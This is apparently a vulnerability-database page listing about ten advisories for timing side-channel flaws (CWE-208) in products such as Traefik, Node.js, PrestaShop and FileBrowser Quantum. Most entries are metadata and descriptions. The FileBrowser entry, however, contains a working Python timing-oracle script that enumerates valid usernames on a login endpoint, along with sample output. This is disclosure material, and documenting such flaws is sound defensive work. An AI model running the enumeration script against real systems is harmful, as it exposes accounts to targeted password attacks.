Common Weakness Enumeration

CWE-208

Allowed

Observable Timing Discrepancy

Abstraction: Base · Status: Incomplete

Two separate operations in a product require different amounts of time to complete, in a way that is observable to an actor and reveals security-relevant information about the state of the product, such as whether a particular operation was successful or not.

306 vulnerabilities reference this CWE, most recent first.

GHSA-67C4-7F3G-R556

Vulnerability from github – Published: 2023-12-21 21:30 – Updated: 2023-12-21 21:30
VLAI
Details

An Observable Timing Discrepancy, Covert Timing Channel vulnerability in Silabs GSDK on ARM potentially allows Padding Oracle Crypto Attack on CBC PKCS7.This issue affects GSDK: through 4.4.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-41097"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203",
      "CWE-208"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-12-21T21:15:08Z",
    "severity": "MODERATE"
  },
  "details": "An Observable Timing Discrepancy, Covert Timing Channel vulnerability in Silabs GSDK on ARM potentially allows Padding Oracle Crypto Attack on CBC PKCS7.This issue affects GSDK: through 4.4.0.\n\n",
  "id": "GHSA-67c4-7f3g-r556",
  "modified": "2023-12-21T21:30:31Z",
  "published": "2023-12-21T21:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41097"
    },
    {
      "type": "WEB",
      "url": "https://github.com/SiliconLabs/gecko_sdk/releases"
    },
    {
      "type": "WEB",
      "url": "https://siliconlabs.lightning.force.com/sfc/servlet.shepherd/document/download/069Vm0000007rArIAI?operationContext=S1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-67V7-3G49-MXH2

Vulnerability from github – Published: 2026-02-03 21:13 – Updated: 2026-02-06 21:43
VLAI
Summary
PrestaShop affected by time based enumeration in FO login form
Details

Impact

A time-based user enumeration vulnerability in the user authentication functionality of PrestaShop. This vulnerability allows an attacker to determine whether a customer account exists in the system by measuring response times.

Patches

8.2.4 and 9.0.3

Workarounds

none

References

Found by Lam Yiu Tung

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "prestashop/prestashop"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "9.0.0-alpha.1"
            },
            {
              "fixed": "9.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "prestashop/prestashop"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "8.2.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25597"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-03T21:13:02Z",
    "nvd_published_at": "2026-02-06T21:16:17Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\nA time-based user enumeration vulnerability in the user authentication functionality of PrestaShop. This vulnerability allows an attacker to determine whether a customer account exists in the system by measuring response times.\n\n### Patches\n8.2.4 and 9.0.3\n\n### Workarounds\nnone\n\n### References\nFound by Lam Yiu Tung",
  "id": "GHSA-67v7-3g49-mxh2",
  "modified": "2026-02-06T21:43:34Z",
  "published": "2026-02-03T21:13:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-67v7-3g49-mxh2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25597"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/PrestaShop/PrestaShop"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PrestaShop/PrestaShop/releases/tag/8.2.4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PrestaShop/PrestaShop/releases/tag/9.0.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PrestaShop affected by time based enumeration in FO login form"
}

GHSA-6R7G-3MM3-FHW7

Vulnerability from github – Published: 2026-03-30 21:31 – Updated: 2026-03-30 21:31
VLAI
Details

A flaw in Node.js HMAC verification uses a non-constant-time comparison when validating user-provided signatures, potentially leaking timing information proportional to the number of matching bytes. Under certain threat models where high-resolution timing measurements are possible, this behavior could be exploited as a timing oracle to infer HMAC values.

Node.js already provides timing-safe comparison primitives used elsewhere in the codebase, indicating this is an oversight rather than an intentional design decision.

This vulnerability affects 20.x, 22.x, 24.x, and 25.x.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-21713"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-30T20:16:19Z",
    "severity": "MODERATE"
  },
  "details": "A flaw in Node.js HMAC verification uses a non-constant-time comparison when validating user-provided signatures, potentially leaking timing information proportional to the number of matching bytes. Under certain threat models where high-resolution timing measurements are possible, this behavior could be exploited as a timing oracle to infer HMAC values.\n\nNode.js already provides timing-safe comparison primitives used elsewhere in the codebase, indicating this is an oversight rather than an intentional design decision.\n\nThis vulnerability affects **20.x, 22.x, 24.x, and 25.x**.",
  "id": "GHSA-6r7g-3mm3-fhw7",
  "modified": "2026-03-30T21:31:04Z",
  "published": "2026-03-30T21:31:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21713"
    },
    {
      "type": "WEB",
      "url": "https://nodejs.org/en/blog/vulnerability/march-2026-security-releases"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6X2Q-H3CR-8J2H

Vulnerability from github – Published: 2026-04-24 20:36 – Updated: 2026-05-06 21:24
VLAI
Summary
Traefik: A timing side-channel vulnerability allows for valid username enumeration via BasicAuth middleware
Details

Summary

There is a timing side-channel vulnerability in Traefik's BasicAuth middleware that allows an attacker to enumerate valid usernames through response-time differences.

The variable intended to hold a constant-time fallback secret always resolves to an empty string, causing the constant-time comparison to short-circuit in microseconds rather than performing a full bcrypt evaluation. This restores the original timing oracle and makes it possible to distinguish existing users from non-existing ones by measuring authentication response times.

Patches

  • https://github.com/traefik/traefik/releases/tag/v2.11.43
  • https://github.com/traefik/traefik/releases/tag/v3.6.14
  • https://github.com/traefik/traefik/releases/tag/v3.7.0-rc.2

For more information

If there are any questions or comments about this advisory, please open an issue.

Original Description # BasicAuth Timing Regression: CVE-2026-32595 Fix Is a No-Op Due to Map Key/Value Confusion ## TL;DR The patch for CVE-2026-32595 is a no-op. Line 49 of `basic_auth.go` has a map key/value confusion that makes `notFoundSecret` always `""`. The "constant time" fallback calls `goauth.CheckSecret(password, "")`, which fast-fails in ~1us instead of running bcrypt (~60ms). ## Evidence (HEAD `786f7192e`, 2026-04-09) Black-box PoC against live traefik binary on port 28080: | bucket | n | median | min | |------------------------------|-----|----------|----------| | existing user (wrong pw) | 240 | 62.85 ms | 57.54 ms | | nonexistent user (wrong pw) | 400 | 0.48 ms | 0.35 ms | Median ratio: **130.4x**. Classification: **8/8 correct**. Go in-tree test: `goauth.CheckSecret` direct ratio **12,746x**. ## Root cause (4-step trace) 1. `basic_auth.go:49`: `users[slices.Collect(maps.Values(users))[0]]` -- looks up a hash as a username key, returns `""`. 2. `basic_auth.go:119-120`: calls `goauth.CheckSecret(password, "")`. 3. `go-http-auth/basic.go:87`: empty string matches no prefix, falls to default `compareMD5HashAndPassword`. 4. `basic.go:107-109`: `bytes.SplitN("", "$", 4)` returns length 1, function returns instantly. ## Files - `poc/exploit.py` -- black-box Python timing oracle - `poc/basic_auth_timing_regression_test.go` -- Go in-tree test - `poc/traefik.yml` + `poc/dynamic.yml` -- traefik config - `poc/live_http_poc_output_head.txt` -- verbatim PoC output on HEAD Koda Reef
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.7.0-ea.1"
            },
            {
              "fixed": "3.7.0-rc.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0-beta1"
            },
            {
              "fixed": "3.6.14"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.11.43"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.7.34"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41263"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-24T20:36:41Z",
    "nvd_published_at": "2026-04-30T21:16:33Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThere is a timing side-channel vulnerability in Traefik\u0027s BasicAuth middleware that allows an attacker to enumerate valid usernames through response-time differences.\n\nThe variable intended to hold a constant-time fallback secret always resolves to an empty string, causing the constant-time comparison to short-circuit in microseconds rather than performing a full bcrypt evaluation. This restores the original timing oracle and makes it possible to distinguish existing users from non-existing ones by measuring authentication response times.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.43\n- https://github.com/traefik/traefik/releases/tag/v3.6.14\n- https://github.com/traefik/traefik/releases/tag/v3.7.0-rc.2\n\n## For more information\n\nIf there are any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Description\u003c/summary\u003e\n\n# BasicAuth Timing Regression: CVE-2026-32595 Fix Is a No-Op Due to Map Key/Value Confusion\n\n## TL;DR\n\nThe patch for CVE-2026-32595 is a no-op. Line 49 of `basic_auth.go` has a\nmap key/value confusion that makes `notFoundSecret` always `\"\"`. The\n\"constant time\" fallback calls `goauth.CheckSecret(password, \"\")`, which\nfast-fails in ~1us instead of running bcrypt (~60ms).\n\n## Evidence (HEAD `786f7192e`, 2026-04-09)\n\nBlack-box PoC against live traefik binary on port 28080:\n\n| bucket                       | n   | median   | min      |\n|------------------------------|-----|----------|----------|\n| existing user (wrong pw)     | 240 | 62.85 ms | 57.54 ms |\n| nonexistent user (wrong pw)  | 400 |  0.48 ms |  0.35 ms |\n\nMedian ratio: **130.4x**. Classification: **8/8 correct**.\n\nGo in-tree test: `goauth.CheckSecret` direct ratio **12,746x**.\n\n## Root cause (4-step trace)\n\n1. `basic_auth.go:49`: `users[slices.Collect(maps.Values(users))[0]]` -- looks\n   up a hash as a username key, returns `\"\"`.\n2. `basic_auth.go:119-120`: calls `goauth.CheckSecret(password, \"\")`.\n3. `go-http-auth/basic.go:87`: empty string matches no prefix, falls to default\n   `compareMD5HashAndPassword`.\n4. `basic.go:107-109`: `bytes.SplitN(\"\", \"$\", 4)` returns length 1, function\n   returns instantly.\n\n## Files\n\n- `poc/exploit.py` -- black-box Python timing oracle\n- `poc/basic_auth_timing_regression_test.go` -- Go in-tree test\n- `poc/traefik.yml` + `poc/dynamic.yml` -- traefik config\n- `poc/live_http_poc_output_head.txt` -- verbatim PoC output on HEAD\n\n\nKoda Reef\n\n\u003c/details\u003e\n\n---",
  "id": "GHSA-6x2q-h3cr-8j2h",
  "modified": "2026-05-06T21:24:51Z",
  "published": "2026-04-24T20:36:41Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/security/advisories/GHSA-6x2q-h3cr-8j2h"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41263"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/traefik/traefik"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v2.11.43"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.6.14"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-rc.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Traefik: A timing side-channel vulnerability allows for valid username enumeration via BasicAuth middleware"
}

GHSA-6XWW-RMPP-RHM3

Vulnerability from github – Published: 2024-03-12 12:30 – Updated: 2024-08-05 21:31
VLAI
Details

The authentication method in Apache Doris versions before 2.0.0 was vulnerable to timing attacks. Users are recommended to upgrade to version 2.0.0 + or 1.2.8, which fixes this issue.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-41313"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-03-12T11:15:46Z",
    "severity": "CRITICAL"
  },
  "details": "The authentication method in Apache Doris versions before 2.0.0 was vulnerable to timing attacks.\nUsers are recommended to upgrade to version 2.0.0 + or 1.2.8, which fixes this issue.\n\n",
  "id": "GHSA-6xww-rmpp-rhm3",
  "modified": "2024-08-05T21:31:18Z",
  "published": "2024-03-12T12:30:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41313"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread/jqczy3vxzs6q6rz9o0626j5nks9fnv95"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2024/03/10/2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-72PX-4JM6-9942

Vulnerability from github – Published: 2025-02-12 00:32 – Updated: 2025-02-13 00:33
VLAI
Details

An issue was discovered in the Winbox service of MikroTik RouterOS v6.43 through v7.16.1. A discrepancy in response times between connection attempts made with a valid username and those with an invalid username allows attackers to enumerate for valid accounts.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-54772"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-11T23:15:09Z",
    "severity": "MODERATE"
  },
  "details": "An issue was discovered in the Winbox service of MikroTik RouterOS v6.43 through v7.16.1. A discrepancy in response times between connection attempts made with a valid username and those with an invalid username allows attackers to enumerate for valid accounts.",
  "id": "GHSA-72px-4jm6-9942",
  "modified": "2025-02-13T00:33:03Z",
  "published": "2025-02-12T00:32:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-54772"
    },
    {
      "type": "WEB",
      "url": "https://github.com/deauther890/CVE-2024-54772"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-75XC-QVXH-27F8

Vulnerability from github – Published: 2021-04-19 14:51 – Updated: 2021-04-16 23:15
VLAI
Summary
Timing side channel vulnerability in UIDL request handler in Vaadin 7 and 8
Details

Non-constant-time comparison of CSRF tokens in UIDL request handler in com.vaadin:vaadin-server versions 7.0.0 through 7.7.23 (Vaadin 7.0.0 through 7.7.23), and 8.0.0 through 8.12.2 (Vaadin 8.0.0 through 8.12.2) allows attacker to guess a security token via timing attack

  • https://vaadin.com/security/cve-2021-31403
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.vaadin:vaadin-bom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0.0"
            },
            {
              "fixed": "7.7.24"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.vaadin:vaadin-bom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "8.0.0"
            },
            {
              "fixed": "8.12.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.vaadin:vaadin-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0.0"
            },
            {
              "fixed": "7.7.24"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.vaadin:vaadin-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "8.0.0"
            },
            {
              "fixed": "8.12.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-31403"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203",
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-16T23:15:02Z",
    "nvd_published_at": "2021-04-23T16:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Non-constant-time comparison of CSRF tokens in UIDL request handler in `com.vaadin:vaadin-server` versions 7.0.0 through 7.7.23 (Vaadin 7.0.0 through 7.7.23), and 8.0.0 through 8.12.2 (Vaadin 8.0.0 through 8.12.2) allows attacker to guess a security token via timing attack\n\n- https://vaadin.com/security/cve-2021-31403",
  "id": "GHSA-75xc-qvxh-27f8",
  "modified": "2021-04-16T23:15:02Z",
  "published": "2021-04-19T14:51:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vaadin/framework/security/advisories/GHSA-75xc-qvxh-27f8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31403"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vaadin/framework/pull/12188"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vaadin/framework/pull/12190"
    },
    {
      "type": "WEB",
      "url": "https://vaadin.com/security/cve-2021-31403"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Timing side channel vulnerability in UIDL request handler in Vaadin 7 and 8"
}

GHSA-7789-65HX-F26W

Vulnerability from github – Published: 2026-03-24 19:18 – Updated: 2026-07-08 17:35
VLAI
Summary
FileBrowser Quantum has Username Enumeration via Authentication Timing Side-Channel
Details

Summary

The /api/auth/login authentication endpoint does not execute in constant time. When a non-existent username is supplied, the server returns a 401/403 response almost immediately. When a valid username is provided, the server performs a bcrypt password comparison, causing a measurable delay in the response time.

Details

The vulnerability exists in the Auth function of JSONAuth in auth/json.go (lines 45–52). The function performs a database lookup for the user prior to performing any password validation.

user, err := userStore.Get(username)
    if err != nil {
        return nil, fmt.Errorf("unable to get user from store: %v", err)
    }
    err = users.CheckPwd(password, user.Password)
    if err != nil {
        return nil, err
    }

If the username is not found, the function returns an error immediately. If the username is found, the function calls CheckPwd, which executes the bcrypt hash comparison. Because bcrypt is intentionally computationally expensive, this introduces a measurable delay in the response time.

As a result, an attacker can distinguish valid usernames from invalid ones by measuring the authentication response times.

In testing, responses for valid usernames consistently required approximately 40–50 ms due to the bcrypt comparison, while invalid usernames returned in approximately 1–4 ms.

PoC

The script below automates this attack by calibrating the network latency using non-existent usernames to establish a baseline and then testing a list of target users. Valid usernames are detected when the response time exceeds the baseline.

import requests
import time
import statistics

# Configuration - adjust domain and wordlist as appropriate
TARGET_URL = "http://localhost/api/auth/login"
WORDLIST = ["admin", "root", "user2", "nonexistent_test_user"]

def measure(username):
    start = time.perf_counter()
    requests.post(TARGET_URL, params={"username": username}, headers={"X-Password": "wrong-password"})
    return time.perf_counter() - start

# 1. Baseline Calibration
print("[*] Calibrating...")
baselines = [measure(f"not_a_user_{i}") for i in range(20)]
threshold = statistics.mean(baselines) + (statistics.stdev(baselines) * 5)
print(f"[*] Baseline: {statistics.mean(baselines):.4f}s | Threshold: {threshold:.4f}s")

# 2. Validation Test
for user in WORDLIST:
    t = measure(user)
    status = "VALID" if t > threshold else "invalid"
    print(f"{user:<15} | {t:.4f}s | {status}")

Example output (with admin and user2 configured as valid users in the application):

$ python timeattack.py
[*] Calibrating...
[*] Baseline: 0.0041s | Threshold: 0.0256s
admin           | 0.0505s | VALID
root            | 0.0019s | invalid
user2           | 0.0464s | VALID
nonexistent_test_user | 0.0015s | invalid

Impact

An unauthenticated attacker can enumerate valid usernames by measuring authentication response times.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/gtsteffaniak/filebrowser/backend"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260317230626-af08800667b8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-54685"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-24T19:18:56Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nThe `/api/auth/login` authentication endpoint does not execute in constant time. When a non-existent username is supplied, the server returns a `401`/`403` response almost immediately. When a valid username is provided, the server performs a bcrypt password comparison, causing a measurable delay in the response time.\n\n### Details\n\nThe vulnerability exists in the `Auth` function of `JSONAuth` in `auth/json.go` (lines 45\u201352). The function performs a database lookup for the user prior to performing any password validation.\n\n```go\nuser, err := userStore.Get(username)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"unable to get user from store: %v\", err)\n\t}\n\terr = users.CheckPwd(password, user.Password)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n```\n\nIf the username is not found, the function returns an error immediately. If the username is found, the function calls `CheckPwd`, which executes the bcrypt hash comparison. Because bcrypt is intentionally computationally expensive, this introduces a measurable delay in the response time.\n\nAs a result, an attacker can distinguish valid usernames from invalid ones by measuring the authentication response times.\n\nIn testing, responses for valid usernames consistently required approximately 40\u201350 ms due to the bcrypt comparison, while invalid usernames returned in approximately 1\u20134 ms.\n\n### PoC\n\nThe script below automates this attack by calibrating the network latency using non-existent usernames to establish a baseline and then testing a list of target users. Valid usernames are detected when the response time exceeds the baseline.\n\n```python\nimport requests\nimport time\nimport statistics\n\n# Configuration - adjust domain and wordlist as appropriate\nTARGET_URL = \"http://localhost/api/auth/login\"\nWORDLIST = [\"admin\", \"root\", \"user2\", \"nonexistent_test_user\"]\n\ndef measure(username):\n    start = time.perf_counter()\n    requests.post(TARGET_URL, params={\"username\": username}, headers={\"X-Password\": \"wrong-password\"})\n    return time.perf_counter() - start\n\n# 1. Baseline Calibration\nprint(\"[*] Calibrating...\")\nbaselines = [measure(f\"not_a_user_{i}\") for i in range(20)]\nthreshold = statistics.mean(baselines) + (statistics.stdev(baselines) * 5)\nprint(f\"[*] Baseline: {statistics.mean(baselines):.4f}s | Threshold: {threshold:.4f}s\")\n\n# 2. Validation Test\nfor user in WORDLIST:\n    t = measure(user)\n    status = \"VALID\" if t \u003e threshold else \"invalid\"\n    print(f\"{user:\u003c15} | {t:.4f}s | {status}\")\n```\n\nExample output (with `admin` and `user2` configured as valid users in the application):\n\n```\n$ python timeattack.py\n[*] Calibrating...\n[*] Baseline: 0.0041s | Threshold: 0.0256s\nadmin           | 0.0505s | VALID\nroot            | 0.0019s | invalid\nuser2           | 0.0464s | VALID\nnonexistent_test_user | 0.0015s | invalid\n```\n\n### Impact\n\nAn unauthenticated attacker can enumerate valid usernames by measuring authentication response times.",
  "id": "GHSA-7789-65hx-f26w",
  "modified": "2026-07-08T17:35:48Z",
  "published": "2026-03-24T19:18:56Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-7789-65hx-f26w"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gtsteffaniak/filebrowser/commit/af08800667b874620edc6f44c3e2e64fec7abd85"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gtsteffaniak/filebrowser"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gtsteffaniak/filebrowser/releases/tag/v1.3.2-beta"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "FileBrowser Quantum has Username Enumeration via Authentication Timing Side-Channel"
}

GHSA-7P89-P6HX-Q4FW

Vulnerability from github – Published: 2024-09-30 17:48 – Updated: 2024-09-30 20:11
VLAI
Summary
basic-auth-connect's callback uses time unsafe string comparison
Details

Impact

basic-auth-connect <1.1.0 uses a timing-unsafe equality comparison that can leak timing information

Patches

this issue has been fixed in basic-auth-connect 1.1.0

References

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "basic-auth-connect"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-47178"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-09-30T17:48:29Z",
    "nvd_published_at": "2024-09-30T16:15:09Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nbasic-auth-connect \u003c1.1.0 uses a timing-unsafe equality comparison that can leak timing information\n\n### Patches\n\nthis issue has been fixed in basic-auth-connect 1.1.0\n\n### References\n",
  "id": "GHSA-7p89-p6hx-q4fw",
  "modified": "2024-09-30T20:11:40Z",
  "published": "2024-09-30T17:48:29Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/expressjs/basic-auth-connect/security/advisories/GHSA-7p89-p6hx-q4fw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47178"
    },
    {
      "type": "WEB",
      "url": "https://github.com/expressjs/basic-auth-connect/commit/bac1e6a8530e1efd0028800b9b588a37adb0d203"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/expressjs/basic-auth-connect"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "basic-auth-connect\u0027s callback uses time unsafe string comparison"
}

GHSA-7R92-3JGR-R65Q

Vulnerability from github – Published: 2026-05-06 22:40 – Updated: 2026-05-14 20:42
VLAI
Summary
pyquorum: Timing side‑channel in mul_mod
Details

Impact

The mul_mod function implements multiplication via a binary expansion loop whose execution time depends on the Hamming weight of the second operand (the exponent). An attacker who can measure the time of secret‑sharing operations (e.g., via a remote service) could progressively recover the values of shares, ultimately leading to secret reconstruction.

Patches

https://github.com/svvqt/pyquorum/releases/tag/v0.2.1

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "pyquorum"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44368"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T22:40:15Z",
    "nvd_published_at": "2026-05-13T21:16:47Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\nThe `mul_mod` function implements multiplication via a binary expansion loop whose execution time depends on the Hamming weight of the second operand (the exponent). An attacker who can measure the time of secret\u2011sharing operations (e.g., via a remote service) could progressively recover the values of shares, ultimately leading to secret reconstruction.\n\n### Patches\nhttps://github.com/svvqt/pyquorum/releases/tag/v0.2.1",
  "id": "GHSA-7r92-3jgr-r65q",
  "modified": "2026-05-14T20:42:45Z",
  "published": "2026-05-06T22:40:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/svvqt/pyquorum/security/advisories/GHSA-7r92-3jgr-r65q"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44368"
    },
    {
      "type": "WEB",
      "url": "https://github.com/svvqt/pyquorum/commit/1e9ac41dd3c305c13d7a6b7d227bf325be82d730"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/svvqt/pyquorum"
    },
    {
      "type": "WEB",
      "url": "https://github.com/svvqt/pyquorum/releases/tag/v0.2.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
